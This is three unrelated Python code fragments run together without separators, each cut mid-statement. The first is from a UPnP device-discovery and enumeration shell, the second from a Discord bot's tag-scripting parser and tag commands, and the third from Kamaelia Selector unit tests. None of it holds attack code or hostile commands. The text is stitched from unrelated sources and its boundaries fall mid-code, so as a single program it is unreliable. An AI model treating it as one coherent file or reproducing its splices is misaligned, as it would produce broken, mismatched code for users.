= "deviceType" deviceListEntries = "deviceList" deviceTags = ["friendlyName","modelDescription","modelName","modelNumber","modelURL","presentationURL","UDN","UPC","manufacturer","manufacturerURL"] #Find all device entries listed in the XML file for device in xmlRoot.getElementsByTagName(devTag): try: #Get the deviceType string deviceTypeName = str(device.getElementsByTagName(deviceType)[0].childNodes[0].data) except: continue #Pull out the action device name from the deviceType string deviceDisplayName = self.parseDeviceTypeName(deviceTypeName) if not deviceDisplayName: continue #Create a new device entry for this host in the ENUM_HOSTS structure deviceEntryPointer = self.ENUM_HOSTS[index][deviceListEntries][deviceDisplayName] = {} deviceEntryPointer['fullName'] = deviceTypeName #Parse out all the device tags for that device for tag in deviceTags: try: deviceEntryPointer[tag] = str(device.getElementsByTagName(tag)[0].childNodes[0].data) except Exception, e: if self.VERBOSE: print 'Device',deviceEntryPointer['fullName'],'does not have a',tag continue #Get a list of all services for this device listing self.parseServiceList(device,deviceEntryPointer,index) return #Parse the list of services specified in the XML file def parseServiceList(self,xmlRoot,device,index): serviceEntryPointer = False dictName = "services" serviceListTag = "serviceList" serviceTag = "service" serviceNameTag = "serviceType" serviceTags = ["serviceId","controlURL","eventSubURL","SCPDURL"] try: device[dictName] = {} #Get a list of all services offered by this device for service in xmlRoot.getElementsByTagName(serviceListTag)[0].getElementsByTagName(serviceTag): #Get the full service descriptor serviceName = str(service.getElementsByTagName(serviceNameTag)[0].childNodes[0].data) #Get the service name from the service descriptor string serviceDisplayName = self.parseServiceTypeName(serviceName) if not serviceDisplayName: continue #Create new service entry for the device in ENUM_HOSTS 
serviceEntryPointer = device[dictName][serviceDisplayName] = {} serviceEntryPointer['fullName'] = serviceName #Get all of the required service info and add it to ENUM_HOSTS for tag in serviceTags: serviceEntryPointer[tag] = str(service.getElementsByTagName(tag)[0].childNodes[0].data) #Get specific service info about this service self.parseServiceInfo(serviceEntryPointer,index) except Exception, e: print 'Caught exception while parsing device service list:',e #Parse details about each service (arguements, variables, etc) def parseServiceInfo(self,service,index): argIndex = 0 argTags = ['direction','relatedStateVariable'] actionList = 'actionList' actionTag = 'action' nameTag = 'name' argumentList = 'argumentList' argumentTag = 'argument' #Get the full path to the service's XML file xmlFile = self.ENUM_HOSTS[index]['proto'] + self.ENUM_HOSTS[index]['name'] if not xmlFile.endswith('/') and not service['SCPDURL'].startswith('/'): try: xmlServiceFile = self.ENUM_HOSTS[index]['xmlFile'] slashIndex = xmlServiceFile.rfind('/') xmlFile = xmlServiceFile[:slashIndex] + '/' except: xmlFile += '/' if self.ENUM_HOSTS[index]['proto'] in service['SCPDURL']: xmlFile = service['SCPDURL'] else: xmlFile += service['SCPDURL'] service['actions'] = {} #Get the XML file that describes this service (xmlHeaders,xmlData) = self.getXML(xmlFile) if not xmlData: print 'Failed to retrieve service descriptor located at:',xmlFile return False try: xmlRoot = minidom.parseString(xmlData) #Get a list of actions for this service try: actionList = xmlRoot.getElementsByTagName(actionList)[0] except: print 'Failed to retrieve action list for service %s!' 
% service['fullName'] return False actions = actionList.getElementsByTagName(actionTag) if actions == []: return False #Parse all actions in the service's action list for action in actions: #Get the action's name try: actionName = str(action.getElementsByTagName(nameTag)[0].childNodes[0].data).strip() except: print 'Failed to obtain service action name (%s)!' % service['fullName'] continue #Add the action to the ENUM_HOSTS dictonary service['actions'][actionName] = {} service['actions'][actionName]['arguments'] = {} #Parse all of the action's arguments try: argList = action.getElementsByTagName(argumentList)[0] except: #Some actions may take no arguments, so continue without raising an error here... continue #Get all the arguments in this action's argument list arguments = argList.getElementsByTagName(argumentTag) if arguments == []: if self.VERBOSE: print 'Action',actionName,'has no arguments!' continue #Loop through the action's arguments, appending them to the ENUM_HOSTS dictionary for argument in arguments: try: argName = str(argument.getElementsByTagName(nameTag)[0].childNodes[0].data) except: print 'Failed to get argument name for',actionName continue service['actions'][actionName]['arguments'][argName] = {} #Get each required argument tag value and add them to ENUM_HOSTS for tag in argTags: try: service['actions'][actionName]['arguments'][argName][tag] = str(argument.getElementsByTagName(tag)[0].childNodes[0].data) except: print 'Failed to find tag %s for argument %s!' 
% (tag,argName) continue #Parse all of the state variables for this service self.parseServiceStateVars(xmlRoot,service) except Exception, e: print 'Caught exception while parsing Service info for service %s: %s' % (service['fullName'],str(e)) return False return True #Get info about a service's state variables def parseServiceStateVars(self,xmlRoot,servicePointer): na = 'N/A' varVals = ['sendEvents','dataType','defaultValue','allowedValues'] serviceStateTable = 'serviceStateTable' stateVariable = 'stateVariable' nameTag = 'name' dataType = 'dataType' sendEvents = 'sendEvents' allowedValueList = 'allowedValueList' allowedValue = 'allowedValue' allowedValueRange = 'allowedValueRange' minimum = 'minimum' maximum = 'maximum' #Create the serviceStateVariables entry for this service in ENUM_HOSTS servicePointer['serviceStateVariables'] = {} #Get a list of all state variables associated with this service try: stateVars = xmlRoot.getElementsByTagName(serviceStateTable)[0].getElementsByTagName(stateVariable) except: #Don't necessarily want to throw an error here, as there may be no service state variables return False #Loop through all state variables for var in stateVars: for tag in varVals: #Get variable name try: varName = str(var.getElementsByTagName(nameTag)[0].childNodes[0].data) except: print 'Failed to get service state variable name for service %s!' 
% servicePointer['fullName'] continue servicePointer['serviceStateVariables'][varName] = {} try: servicePointer['serviceStateVariables'][varName]['dataType'] = str(var.getElementsByTagName(dataType)[0].childNodes[0].data) except: servicePointer['serviceStateVariables'][varName]['dataType'] = na try: servicePointer['serviceStateVariables'][varName]['sendEvents'] = str(var.getElementsByTagName(sendEvents)[0].childNodes[0].data) except: servicePointer['serviceStateVariables'][varName]['sendEvents'] = na servicePointer['serviceStateVariables'][varName][allowedValueList] = [] #Get a list of allowed values for this variable try: vals = var.getElementsByTagName(allowedValueList)[0].getElementsByTagName(allowedValue) except: pass else: #Add the list of allowed values to the ENUM_HOSTS dictionary for val in vals: servicePointer['serviceStateVariables'][varName][allowedValueList].append(str(val.childNodes[0].data)) #Get allowed value range for this variable try: valList = var.getElementsByTagName(allowedValueRange)[0] except: pass else: #Add the max and min values to the ENUM_HOSTS dictionary servicePointer['serviceStateVariables'][varName][allowedValueRange] = [] try: servicePointer['serviceStateVariables'][varName][allowedValueRange].append(str(valList.getElementsByTagName(minimum)[0].childNodes[0].data)) servicePointer['serviceStateVariables'][varName][allowedValueRange].append(str(valList.getElementsByTagName(maximum)[0].childNodes[0].data)) except: pass return True #Update the command completer def updateCmdCompleter(self,struct): indexOnlyList = { 'host' : ['get','details','summary'], 'save' : ['info'] } hostCommand = 'host' subCommandList = ['info'] sendCommand = 'send' try: structPtr = {} topLevelKeys = {} for key,val in struct.iteritems(): structPtr[str(key)] = val topLevelKeys[str(key)] = None #Update the subCommandList for subcmd in subCommandList: self.completer.commands[hostCommand][subcmd] = None self.completer.commands[hostCommand][subcmd] = structPtr #Update 
the indexOnlyList for cmd,data in indexOnlyList.iteritems(): for subcmd in data: self.completer.commands[cmd][subcmd] = topLevelKeys #This is for updating the sendCommand key structPtr = {} for hostIndex,hostData in struct.iteritems(): host = str(hostIndex) structPtr[host] = {} if hostData.has_key('deviceList'): for device,deviceData in hostData['deviceList'].iteritems(): structPtr[host][device] = {} if deviceData.has_key('services'): for service,serviceData in deviceData['services'].iteritems(): structPtr[host][device][service] = {} if serviceData.has_key('actions'): for action,actionData in serviceData['actions'].iteritems(): structPtr[host][device][service][action] = None self.completer.commands[hostCommand][sendCommand] = structPtr except Exception,e: print "Error updating command completer structure; some command completion features might not work..." return ################## Action Functions ###################### #These functions handle user commands from the shell #Actively search for UPNP devices def msearch(argc,argv,hp): defaultST = "upnp:rootdevice" st = "schemas-upnp-org" myip = '' lport = hp.port if argc >= 3: if argc == 4 or argv[1] != "uuid": if argc == 4: st = argv[1] searchType = argv[2] searchName = argv[3] else: searchType = argv[1] searchName = argv[2] st = "urn:%s:%s:%s:%s" % (st,searchType,searchName,hp.UPNP_VERSION.split('.')[0]) else: uuid = argv[2] st = "uuid:%s" % uuid else: st = defaultST #Build the request request = "M-SEARCH * HTTP/1.1\r\n"\ "HOST:%s:%d\r\n"\ "ST:%s\r\n" % (hp.ip,hp.port,st) for header,value in hp.msearchHeaders.iteritems(): request += header + ':' + value + "\r\n" request += "\r\n" print "Entering discovery mode for '%s', Ctl+C to stop..." 
% st print '' #Have to create a new socket since replies will be sent directly to our IP, not the multicast IP if hp.LISTENER_LIMIT: myip = gethostbyname(gethostname()) server = hp.createNewListener(myip,lport) if server == False: print 'Failed to bind port %d' % lport return hp.send(request,server) count = 0 start = time.time() while True: try: if hp.MAX_HOSTS > 0 and count >= hp.MAX_HOSTS: break if hp.TIMEOUT > 0 and (time.time() - start) > hp.TIMEOUT: raise Exception("Timeout exceeded") if hp.parseSSDPInfo(hp.recv(1024,server),False,False): count += 1 except Exception, e: print '\nDiscover mode halted...' break #Passively listen for UPNP NOTIFY packets def pcap(argc,argv,hp): print 'Entering passive mode, Ctl+C to stop...' print '' count = 0 start = time.time() while True: try: if hp.MAX_HOSTS > 0 and count >= hp.MAX_HOSTS: break if hp.TIMEOUT > 0 and (time.time() - start) > hp.TIMEOUT: raise Exception ("Timeout exceeded") if hp.parseSSDPInfo(hp.recv(1024,False),False,False): count += 1 except Exception, e: print "\nPassive mode halted..." 
            break
# NOTE(review): the `break` above is the tail of pcap()'s except handler,
# whose beginning lies before this chunk.

#Manipulate M-SEARCH header values
def head(argc,argv,hp):
    """Interactive `head` command: show, set or delete M-SEARCH headers.

    argc/argv are the shell-style argument count and list; hp is the
    application object whose msearchHeaders dict is manipulated.
    Falls through to showHelp() when the arguments do not match a branch.
    """
    if argc >= 2:
        action = argv[1]
        #Show current headers
        if action == 'show':
            for header,value in hp.msearchHeaders.iteritems():
                print header,':',value
            return
        #Delete the specified header
        elif action == 'del':
            if argc == 3:
                header = argv[2]
                if hp.msearchHeaders.has_key(header):
                    del hp.msearchHeaders[header]
                    print '%s removed from header list' % header
                    return
                else:
                    print '%s is not in the current header list' % header
                    return
        #Create/set a headers
        elif action == 'set':
            if argc == 4:
                header = argv[2]
                value = argv[3]
                hp.msearchHeaders[header] = value
                # NOTE(review): the format string below has an unbalanced
                # quote ("'%s:%s"); cosmetic output bug, left as-is here.
                print "Added header: '%s:%s" % (header,value)
                return
    showHelp(argv[0])

#Manipulate application settings
def set(argc,argv,hp):
    # NOTE(review): shadows the builtin `set`; kept because the interactive
    # shell dispatches commands to same-named functions.
    # Toggles or assigns the application flags held on hp (UNIQ, DEBUG,
    # VERBOSE, UPNP_VERSION, IFACE, socket, ...).
    if argc >= 2:
        action = argv[1]
        if action == 'uniq':
            hp.UNIQ = toggleVal(hp.UNIQ)
            print "Show unique hosts set to: %s" % hp.UNIQ
            return
        elif action == 'debug':
            hp.DEBUG = toggleVal(hp.DEBUG)
            print "Debug mode set to: %s" % hp.DEBUG
            return
        elif action == 'verbose':
            hp.VERBOSE = toggleVal(hp.VERBOSE)
            print "Verbose mode set to: %s" % hp.VERBOSE
            return
        elif action == 'version':
            if argc == 3:
                hp.UPNP_VERSION = argv[2]
                print 'UPNP version set to: %s' % hp.UPNP_VERSION
            else:
                showHelp(argv[0])
            return
        elif action == 'iface':
            if argc == 3:
                hp.IFACE = argv[2]
                print 'Interface set to %s, re-binding sockets...' % hp.IFACE
                if hp.initSockets(hp.ip,hp.port,hp.IFACE):
                    print 'Interface change successful!'
                else:
                    print 'Failed to bind new interface - are you sure you have root privilages??'
                    hp.IFACE = None
                return
        elif action == 'socket':
            if argc == 3:
                try:
                    (ip,port) = argv[2].split(':')
                    port = int(port)
                    hp.ip = ip
                    hp.port = port
                    # Re-bind sockets on the new multicast ip:port.
                    hp.cleanup()
                    if hp.initSockets(ip,port,hp.IFACE) == False:
                        # NOTE(review): statement truncated at the chunk
                        # boundary; its `% (ip,port)` continues in the next
                        # chunk of the source.
                        print "Setting new socket %s:%d failed!"
% (ip,port) else: print "Using new socket: %s:%d" % (ip,port) except Exception, e: print 'Caught exception setting new socket:',e return elif action == 'listenerlimit': hp.LISTENER_LIMIT = toggleVal(hp.LISTENER_LIMIT) print "Listener limit set to: %s" % hp.LISTENER_LIMIT return elif action == 'timeout': if argc == 3: try: hp.TIMEOUT = int(argv[2]) except Exception, e: print 'Caught exception setting new timeout value:',e return elif action == 'max': if argc == 3: try: hp.MAX_HOSTS = int(argv[2]) except Exception, e: print 'Caught exception setting new max host value:', e return elif action == 'show': print 'Multicast IP: ',hp.ip print 'Multicast port: ',hp.port print 'Network interface: ',hp.IFACE print 'Receive timeout: ',hp.TIMEOUT print 'Host discovery limit: ',hp.MAX_HOSTS print 'Number of known hosts: ',len(hp.ENUM_HOSTS) print 'Listener limit: ',hp.LISTENER_LIMIT print 'UPNP version: ',hp.UPNP_VERSION print 'Debug mode: ',hp.DEBUG print 'Verbose mode: ',hp.VERBOSE print 'Show only unique hosts:',hp.UNIQ print 'Using log file: ',hp.LOG_FILE return showHelp(argv[0]) return #Host command. It's kind of big. def host(argc,argv,hp): hostInfo = None indexList = [] indexError = "Host index out of range. Try the 'host list' command to get a list of known hosts" if argc >= 2: action = argv[1] if action == 'list': if len(hp.ENUM_HOSTS) == 0: print "No known hosts - try running the 'msearch' or 'pcap' commands" return for index,hostInfo in hp.ENUM_HOSTS.iteritems(): print "\t[%d] %s" % (index,hostInfo['name']) return elif action == 'details': if argc == 3: try: index = int(argv[2]) hostInfo = hp.ENUM_HOSTS[index] except Exception, e: print indexError return try: #If this host data is already complete, just display it if hostInfo['dataComplete'] == True: hp.showCompleteHostInfo(index,False) else: print "Can't show host info because I don't have it. 
Please run 'host get %d'" % index except KeyboardInterrupt, e: print "" pass return elif action == 'summary': if argc == 3: try: index = int(argv[2]) hostInfo = hp.ENUM_HOSTS[index] except: print indexError return print 'Host:',hostInfo['name'] print 'XML File:',hostInfo['xmlFile'] for deviceName,deviceData in hostInfo['deviceList'].iteritems(): print deviceName for k,v in
or func == "servercount" or func == "membercount": return str(ctx.guild.member_count) if ctx.guild else "2" elif func == "channel": return ctx.channel.name if ctx.guild else "Direct Message" elif func == "channelid": return str(ctx.channel.id) if ctx.channel else "0" elif func.startswith("randuser"): members = await self.get_rand_members(ctx.guild, variables) member = random.choice(members) if func.endswith("id"): return str(member.id) if ctx.guild else str(ctx.author.id) return member.display_name if ctx.guild else ctx.author.display_name elif func.startswith("randonline"): members = await self.get_rand_members(ctx.guild, variables) member = random.choice([m for m in members if m.status is discord.Status.online]) if func.endswith("id"): return str(member.id) if ctx.guild else str(ctx.author.id) return member.display_name if ctx.guild else ctx.author.display_name elif func == "randchannel": return random.choice(list(ctx.guild.channels)).mention if ctx.guild else ctx.channel.mention elif func == "avatar": if len(args) == 1 and args[0] == "": return str(ctx.author.avatar_url) else: user = await self.find_member(ctx.message, args[0]) if user: return str(user.avatar_url) return "" elif func == "nsfw" and ctx.guild: if not ctx.channel.is_nsfw(): raise checks.Nsfw() return "" # Username and nickname searching elif (func == "name" or func == "user" or func == "nick") and args: query = args[0] if not query: return "" users = None if ctx.guild is not None: users = self.finduser(query, ctx.guild) if users is None or not users: users = self.finduser(query) if not users: raise Tag_Find_Error('No user(s) found with "{0}"'.format(query)) elif len(users) > 1: out = 'Multiple users found with "{0}":'.format(query) for u in users[:6]: out += "\n - {}".format(str(u)) if len(users) > 6: out += "\n and {0} more.".format(str(len(users) - 6)) raise Tag_Find_Error(out) return users[0].display_name if func == "nick" else users[0].name # Tag arguments elif func == "args": return " 
".join(tag_args) elif func == "argslen": return str(len(tag_args)) elif func == "arg" and len(args) >= 1 and args[0].isdigit(): arg_index = int(args[0]) if arg_index < len(tag_args): return tag_args[arg_index] return "" # String functions elif func == "upper": return "|".join(args).upper() elif func == "lower": return "|".join(args).lower() elif func == "len" or func == "length": return str(len("|".join(args))) elif func == "url": return quote("|".join(args)) # Replace elif (func == "replace" or func == "replaceregex") and len(args) >= 3: # Get the pattern, in, and with args. cardinal_args = ["", "", ""] # Contains the following sequence: pattern, in, with addto = 0 for i, c in enumerate(args): if c.startswith("pattern:"): addto = 0 cardinal_args[0] += c[8:] elif c.startswith("with:"): addto = 1 cardinal_args[1] += c[5:] elif c.startswith("in:"): addto = 2 cardinal_args[2] += c[3:] else: cardinal_args[addto] += c if i == 0 else f"|{c}" # return re.sub(cardinal_args[0], cardinal_args[1], cardinal_args[2], \ # flags=re.S|re.X) \ # if func == "replaceregex" else \ # cardinal_args[2].replace(cardinal_args[0], cardinal_args[1]) return cardinal_args[2].replace(cardinal_args[0], cardinal_args[1]) # Numeric functions elif func == "math": result = 0 setr = True # This is used to set result to the first number before doing operations to it. 
op = 0 # Mathematic operation modes: 0=addition, 1=subtraction, 2=multiplication, 3=division, 4=modulo for arg in args: if arg.isdigit(): iarg = int(arg) if setr: result = iarg setr = False else: if op == 0: result += iarg elif op == 1: result -= iarg elif op == 2: result *= iarg elif op == 3: result /= iarg elif op == 4: result %= iarg elif arg == "+": op = 0 elif arg == "-": op = 1 elif arg == "*": op = 2 elif arg == "/": op = 3 elif arg == "%": op = 4 return str(result) # RNG functions elif func == "choose": return random.choice(args) elif func == "range" and len(args) >= 2: try: return str(random.randint(int(args[0]), int(args[1]))) except ValueError: return f"{{{full_args}}}" # Logical and memory functions elif func == "get" and args: if args[0].startswith("__"): raise Tag_Error( "Private variable, cannot start with `__`." ) return str(variables.get(args[0], '')) elif func == "if" and len(args) >= 4: # Get the values to be compared s1 = args[0] s2 = args[2] comparison = args[1] # Get the values to return then_ = "" else_ = "" add2else = False for i,c in enumerate(args[3:]): if c.startswith("then:"): add2else = False then_ += c[5:] elif c.startswith("else:"): add2else = True else_ += c[5:] else: t = f"|{c}" if add2else: else_ += t else: then_ += t # Compare s1 and s2 using comparison if comparison == "=": return then_ if s1 == s2 else else_ # elif comparison == "?": # return then_ if re.search(s2, s1) else else_ try: i1 = float(s1) i2 = float(s2) if comparison == "<": return then_ if i1 < i2 else else_ elif comparison == "<=": return then_ if i1 <= i2 else else_ elif comparison == ">": return then_ if i1 > i2 else else_ elif comparison == ">=": return then_ if i1 >= i2 else else_ elif comparison == "~": return then_ if i1 * 100 == i2 * 100 else else_ except ValueError: if comparison == "~": return then_ if s1.lower() == s2.lower() else else_ return else_ elif func in ("lattach", "lattachment", "last_attachment") \ and (len(args) == 1 and not args[0]): 
            # NOTE(review): the two lines below are the body of an `elif`
            # (lattach/lattachment/last_attachment) whose condition begins
            # before this chunk.
            variables['__network_requests'] += 1
            return await self.get_attachment_image(ctx, check=None) or ""
        elif (func == "hastebin" or func == "haste") and args[0]:
            variables['__network_requests'] += 1
            return await self.hastebin(args[0])
        elif (func == "text" or func == "download") and args[0]:
            variables['__network_requests'] += 1
            # Default to http:// when no scheme was supplied.
            url = f"http://{args[0]}" if not args[0].startswith('http') else args[0]
            return await self.get_text(
                url, timeout=6, proxy=True, discord_limit=True
            ) or ""
        elif func == "prefix" and (len(args) == 1 and args[0] == ""):
            return (await get_prefix(self.bot, ctx.message))[0][0]
        elif func == "substring" and len(args) >= 3:
            start = int(args[1])
            end = int(args[2])
            return args[0][start:end]
        elif func == "code" and args[0]:
            # Optional second argument selects the code-block language.
            if len(args) > 1:
                lang = args[1]
            else:
                lang = "fix"
            return self.code_block("|".join(args), lang)
        # Rextester
        # always leave for last
        elif args and self.get_lang(func):
            variables['__network_requests'] += 1
            r = await self.code_api(func, args[0], fmt=False)
            return r[0] or r[1]
        # Default value for unknown tag functions
        return f"{{{full_args}}}"

    # Modified 08/15/2020 to disable global tags
    async def get_tag(self, ctx, tag, raw=False, nsfw_check=False, return_guild=False):
        """Look up `tag` scoped to the invoking guild.

        raw=True returns the raw DB rows unmodified; nsfw_check raises
        checks.Nsfw() for {nsfw}-marked tags used in SFW channels;
        return_guild returns the whole row rather than just its content.
        Sends an error message and returns False when the tag is missing.
        """
        sql = "SELECT * FROM `tags` WHERE tag=%s AND "
        sql += "(guild_created=%s OR guild=%s)"
        args = (tag, ctx.guild.id, ctx.guild.id)
        q = await self.cursor.execute(sql, args)
        r = await q.fetchall()
        if raw:
            return r
        if not r:
            await ctx.send(f'\N{NO ENTRY} Tag "{tag}" does not exist!')
            return False
        # Either the first guild tag
        if len(r) > 1:
            r = next(x for x in r if x['guild'])
        # or the first "global" tag
        else:
            r = r[0]
        content = r['content']
        if nsfw_check and (ctx.guild and r"{nsfw}" in content and not ctx.channel.is_nsfw()):
            raise checks.Nsfw()
        if return_guild:
            return r
        return content

    @commands.group(invoke_without_command=True, aliases=['t', 'ta', 'tags'])
    @commands.guild_only()
    @commands.cooldown(4, 2, commands.BucketType.guild)
    async def tag(self, ctx, txt:str, *, after:str=""):
"""Base command for tags, call it with a valid tag to display a tag""" content = await self.get_tag(ctx, txt) if not content: return try: parsed = await asyncio.wait_for(self.parse(ctx, content, after), timeout=30, loop=self.bot.loop) except asyncio.TimeoutError: await ctx.send('\N{WARNING SIGN} `Tag timed out...`') else: await self.send(ctx, parsed, nsfw=True) async def name_check(self, ctx, name): #owner or notsoman maintainer if not await self.bot.is_owner(ctx.author) and ctx.author.id != <PASSWORD>: if name.startswith(r'{') and name.endswith(r'}'): return await ctx.send('\N{NO ENTRY} Tag names cannot start with `{` and end with `}`.') @tag.command(name='add', aliases=['create', 'make']) @commands.guild_only() @commands.cooldown(1, 15, commands.BucketType.guild) async def tag_add(self, ctx, tag:str=None, *, txt:str=""): """Add a tag""" if tag is None: return await ctx.send("Error: Invalid Syntax\nPlease input the tags name\n`.tag add <tag_name> <--this one <tag_content>`") elif not txt and not ctx.message.attachments: return await ctx.send("Error: Invalid Syntax\nPlease input something for the tag to contain\n`.tag add <tag_name> <tag_content> <--this one`") elif len(tag) > 60: return await ctx.send("\N{NO ENTRY} `Tag name limit (<= 60).`") elif await self.name_check(ctx, tag): return sql = f"SELECT COUNT(`user`) as Count FROM `tags` WHERE user={ctx.author.id}" r = await (await self.cursor.execute(sql)).fetchone() if r['Count'] >= 5000: return await ctx.send("\N{NO ENTRY} `Tag limit reached (5000).`") for a in ctx.message.attachments: txt += f"{{attach:{a.proxy_url}}}" gid = ctx.guild and ctx.guild.id result = await self.get_tag(ctx, tag, raw=True) if not result: sql = "INSERT INTO `tags` (`user`, `tag`, `content`, `guild_created`) VALUES (%s, %s, %s, %s)" await self.cursor.execute(sql, (ctx.author.id, tag, txt, gid)) await ctx.send(f"\N{WHITE HEAVY CHECK MARK} Added Tag \"{tag}\"") # elif gid and len(result) == 1 and not result[0]['guild'] \ # and 
result[0]['guild_created'] != gid: # sql = "INSERT INTO `tags` (`guild`, `user`, `tag`, `content`) VALUES (%s, %s, %s, %s)" # await self.cursor.execute(sql, (gid, ctx.author.id, tag, txt)) # return await ctx.send(f"\N{WHITE HEAVY CHECK MARK} Added Guild Tag \"{tag}\"") else: await ctx.send(f"\N{NO ENTRY} Tag \"{tag}\" already exists!") # @tag.command(name='guildadd', aliases=['gcreate', 'gmake', 'gadd']) # @commands.guild_only() # @commands.cooldown(1, 15, commands.BucketType.guild) # async def tag_guildadd(self, ctx, tag:str=None, *, txt:str=""): # """Add a guild tag""" # if tag is None: # return await ctx.send("Error: Invalid Syntax\nPlease input the tags name\n`.tag add <tag_name> <--this one <tag_content>`") # elif not txt and not ctx.message.attachments: # return await ctx.send("Error: Invalid Syntax\nPlease input something for the tag to contain\n`.tag add <tag_name> <tag_content> <--this one`") # elif len(tag) > 60: # return await ctx.send("\N{NO ENTRY} `Tag name limit (<= 60).`") # elif await self.name_check(ctx, tag): # return # for a in ctx.message.attachments: # txt += f"{{attach:{a.proxy_url}}}" # gid = ctx.guild.id # sql = "SELECT tag FROM `tags` WHERE tag=%s AND (guild=%s OR guild_created=%s)" # q = await self.cursor.execute(sql, (tag, gid, gid)) # if await q.fetchone(): # return await ctx.send(f"\N{NO ENTRY} Tag \"{tag}\" already exists!") # sql = "INSERT INTO `tags` (`guild`, `user`, `tag`, `content`) VALUES (%s, %s, %s, %s)" # await self.cursor.execute(sql, (gid, ctx.author.id, tag, txt)) # return await ctx.send(f"\N{WHITE HEAVY CHECK MARK} Added Guild Tag \"{tag}\"") async def remove_global_tag(self, ctx, tag): sql = "SELECT tag FROM `tags` WHERE tag=%s AND user=%s AND guild_created=%s" args = (tag, ctx.author.id, ctx.guild.id) q = await self.cursor.execute(sql, args) if not await q.fetchone(): await ctx.send(f"\N{CROSS MARK} Tag \"{tag}\" does not exist or you don't own it!") else: sql = "DELETE FROM `tags` WHERE tag=%s AND user=%s AND 
guild_created=%s" await self.cursor.execute(sql, args) await ctx.send(f"\N{WHITE HEAVY CHECK MARK} Removed Tag \"{tag}\"") @tag.group(name='remove', aliases=['delete'], invoke_without_command=True) @commands.guild_only() @commands.cooldown(2, 5, commands.BucketType.user) async def tag_remove(self, ctx, *, txt:str=None): """"Remove a tag you own""" if txt
<reponame>sparkslabs/kamaelia_orig<filename>Sketches/MPS/BugReports/FixTests/Kamaelia/Test/Internet/test_Selector.py #!/usr/bin/python # -*- coding: utf-8 -*- # Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1) # # (1) Kamaelia Contributors are listed in the AUTHORS file and at # http://www.kamaelia.org/AUTHORS - please extend this file, # not this notice. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import unittest import sys; sys.path.append("../") import Kamaelia.Internet.Selector as SELECTORMODULE from Kamaelia.Internet.Selector import Selector import Axon from Axon.Ipc import shutdown from Kamaelia.IPC import newReader, removeReader, newWriter, removeWriter, newExceptional, removeExceptional class SmokeTests_Selector(unittest.TestCase): def test_SmokeTest(self): """__init__ - Called with no arguments succeeds""" S = Selector() self.assert_(isinstance(S, Axon.Component.component)) def test_RunsForever(self): """main - Run with no messages, keeps running""" S = Selector() S.activate() for i in xrange(1,100): try: S.next() except StopIteration: self.fail("Component should run until told to stop. 
Failed on iteration: "+str(i))
    # NOTE(review): the line above is the tail of a test method whose start
    # lies outside this chunk; its enclosing TestCase class is not visible here.

    def test_PausesUntilFirstMessage(self):
        """main - Before we recieve any messages telling us what to watch for, the system should pause and yield"""
        S = Selector()
        S.activate()
        V = S.next()  # run one scheduler slice of the component
        # With nothing registered to watch, the component must have paused.
        self.assert_(S._isRunnable() is not True)

    def test_shutdownMessageCausesShutdown(self):
        """main - If the component recieves a shutdown() message, the component shuts down"""
        S = Selector()
        S.activate()
        S._deliver(shutdown(),"control")
        componentExit = False
        # Give the component plenty of scheduler slices to notice the message.
        for i in xrange(2000):
            try:
                S.next()
            except StopIteration:
                componentExit = True
                break
        if not componentExit:
            self.fail("When sent a shutdown message, the component should shutdown")

class MockSelect:
    """This is needed because we need to test that select is being used correctly"""
    # Stand-in for the 'select' module: records every select() call in
    # self.log and optionally replays canned (readers, writers, excepts)
    # result tuples supplied via 'results'.
    def __init__(self, results=None):
        self.log = []
        self.results = results # We're using this simply as a namespace.
    def select(self,*args):
        # Record the call, then either pop the next canned result or echo the
        # requested sets straight back (no canned results => everything "ready").
        self.log.append(("select", args))
        readers,writers, excepts, timeout = args
        if self.results is not None:
            try:
                result = self.results[0]
                del self.results[0]
                return result
            except IndexError:
                # Canned results exhausted: report nothing ready.
                return [],[],[]
        else:
            return readers,writers, excepts
    def addResults(self, results):
        self.results.extend(results)

class Readables_Selector(unittest.TestCase):
    # Verifies the Selector drives select() correctly for readers, writers and
    # exceptionals, and routes readiness notifications back to the service
    # (component, inbox) that registered each selectable.
    def test_SelectIsMockable(self):
        "main - The module uses select, and that is externally mockable"
        try:
            SELECTORMODULE.select
        except AttributeError:
            self.fail("Should import the select module")

    def test_SendingAReadableMessageResultsInItBeingSelectedAgainst(self):
        "main - If we send a newReader message to the notify inbox, it results in the selectable reader being selected on in the readers set"
        MOCKSELECTORMODULE = MockSelect()
        SELECTORMODULE.select = MOCKSELECTORMODULE
        S = Selector()
        S.activate()
        for i in xrange(100): S.next()
        dummyservice = (Axon.Component.component(), "inbox")
        S._deliver(newReader(S,( dummyservice, "LOOKINGFORTHIS")),"notify")
        for i in xrange(100): S.next()
        func, args = MOCKSELECTORMODULE.log[0]
        self.assertEqual("select", func, "select was called in the main loop")
        self.assertEqual(["LOOKINGFORTHIS"], args[0], "The selectable was added to the list of readables")
        self.assertEqual([], args[1], "Writable set should be empty")
        self.assertEqual([], args[2], "Exception set should be empty")
        self.assertEqual(0, args[3], "The select should be non-blocking")

    def test_WeSendTheSelectorAServiceAndSelectableOnlySelectsTheSelectable(self):
        "main - When we send the newReader message, it also includes a service upon which the selector can talk back to us. The selector only selects on the selectable part of the newReader message"
        MOCKSELECTORMODULE = MockSelect()
        SELECTORMODULE.select = MOCKSELECTORMODULE
        S = Selector()
        S.activate()
        for i in xrange(100): S.next()
        dummyservice = (Axon.Component.component(), "inbox")
        S._deliver(newReader(S,( dummyservice, "LOOKINGFORTHIS") ),"notify")
        for i in xrange(100): S.next()
        func, args = MOCKSELECTORMODULE.log[0]
        self.assertEqual("select", func, "select was called in the main loop")
        self.assertEqual(["LOOKINGFORTHIS"], args[0])#, "The selectable was added to the list of readables")
        self.assertEqual([], args[1], "Writable set should be empty")
        self.assertEqual([], args[2], "Exception set should be empty")
        self.assertEqual(0, args[3], "The select should be non-blocking")

    def test_SendingMultipleReadersResultsInAllSelected(self):
        "main - Sending multiple newReader messages results in all being select()ed"
        MOCKSELECTORMODULE = MockSelect()
        SELECTORMODULE.select = MOCKSELECTORMODULE
        S = Selector()
        S.activate()
        for i in xrange(100): S.next()
        dummyservice = (Axon.Component.component(), "inbox")
        S._deliver(newReader(S,( dummyservice, "LOOKINGFORTHIS") ),"notify")
